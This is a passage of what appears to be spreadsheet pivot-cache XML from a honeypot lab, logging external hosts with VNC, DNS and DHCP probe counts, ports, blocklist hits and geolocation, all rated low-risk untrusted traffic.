    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a2d8:f3ef"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="377"/>
    <x v="377"/>
    <s v="unassigned.172-81-62-215.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:30:05"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:30:05"/>
    <n v="411"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_DNS_H40&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H5"/>
    <s v="5900&amp;&amp;53&amp;&amp;12708&amp;&amp;54234&amp;&amp;61227&amp;&amp;64052&amp;&amp;63655"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3ed7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="378"/>
    <x v="378"/>
    <s v="NA&amp;&amp;unassigned.172-81-62-220.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:29:56"/>
    <d v="2024-11-23T04:06:18"/>
    <d v="2025-04-29T18:29:56"/>
    <n v="369"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H46"/>
    <s v="5900&amp;&amp;52824&amp;&amp;60370&amp;&amp;63616&amp;&amp;58104&amp;&amp;64421"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3edc"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="379"/>
    <x v="379"/>
    <s v="NA&amp;&amp;unassigned.172-81-60-75.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:29:53"/>
    <d v="2024-11-23T03:50:17"/>
    <d v="2025-04-29T18:29:53"/>
    <n v="410"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H5"/>
    <s v="5900&amp;&amp;60898&amp;&amp;65119&amp;&amp;52896&amp;&amp;56787&amp;&amp;63169&amp;&amp;53850&amp;&amp;61840&amp;&amp;56365&amp;&amp;56820&amp;&amp;60762&amp;&amp;52401"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3c4b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="380"/>
    <x v="380"/>
    <s v="unassigned.172-81-62-183.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:29:42"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:29:42"/>
    <n v="427"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_DHCP_H3&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_DNS_H27&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;67&amp;&amp;25313&amp;&amp;53&amp;&amp;11237&amp;&amp;60616&amp;&amp;53&amp;&amp;11436&amp;&amp;58449&amp;&amp;57606&amp;&amp;54846&amp;&amp;53010&amp;&amp;54065&amp;&amp;57580&amp;&amp;60604&amp;&amp;52128&amp;&amp;62891&amp;&amp;56202&amp;&amp;55578"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eb7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="381"/>
    <x v="381"/>
    <s v="NA&amp;&amp;unassigned.172-81-62-218.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:29:37"/>
    <d v="2024-12-04T02:36:29"/>
    <d v="2025-04-29T18:29:37"/>
    <n v="330"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_VNC_H44"/>
    <s v="5900&amp;&amp;58307&amp;&amp;64027&amp;&amp;55284&amp;&amp;50753&amp;&amp;50451&amp;&amp;51262&amp;&amp;50386&amp;&amp;57160&amp;&amp;61466&amp;&amp;49974&amp;&amp;51843&amp;&amp;55607"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3eda"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="382"/>
    <x v="382"/>
    <s v="NA&amp;&amp;unassigned.172-81-60-81.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:29:27"/>
    <d v="2024-11-23T04:29:51"/>
    <d v="2025-04-29T18:29:27"/>
    <n v="364"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_VNC_H14"/>
    <s v="61330&amp;&amp;5900&amp;&amp;59888&amp;&amp;62111&amp;&amp;52068&amp;&amp;50188&amp;&amp;51637&amp;&amp;61984&amp;&amp;65030&amp;&amp;62237&amp;&amp;50442&amp;&amp;65041"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3c51"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="383"/>
    <x v="383"/>
    <s v="unassigned.142-202-189-47.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:29:26"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:29:26"/>
    <n v="467"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;25369&amp;&amp;52722&amp;&amp;50120&amp;&amp;59521&amp;&amp;49657&amp;&amp;60266&amp;&amp;64841&amp;&amp;55791&amp;&amp;49371&amp;&amp;60634&amp;&amp;51247&amp;&amp;59816"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="None"/>
    <s v="DYNU"/>
    <s v="2019-12-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8eca:bd2f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="384"/>
    <x v="384"/>
    <s v="unassigned.142-202-189-46.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:29:26"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:29:26"/>
    <n v="502"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;24235&amp;&amp;63908&amp;&amp;64383&amp;&amp;53523&amp;&amp;49595&amp;&amp;51911&amp;&amp;59456&amp;&amp;62402"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-12-18"/>
    <s v="DYNU"/>
    <s v="2019-12-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8eca:bd2e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="385"/>
    <x v="385"/>
    <s v="NA&amp;&amp;unassigned.172-81-62-236.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T18:28:37"/>
    <d v="2024-11-23T03:59:30"/>
    <d v="2025-04-29T18:28:37"/>
    <n v="397"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
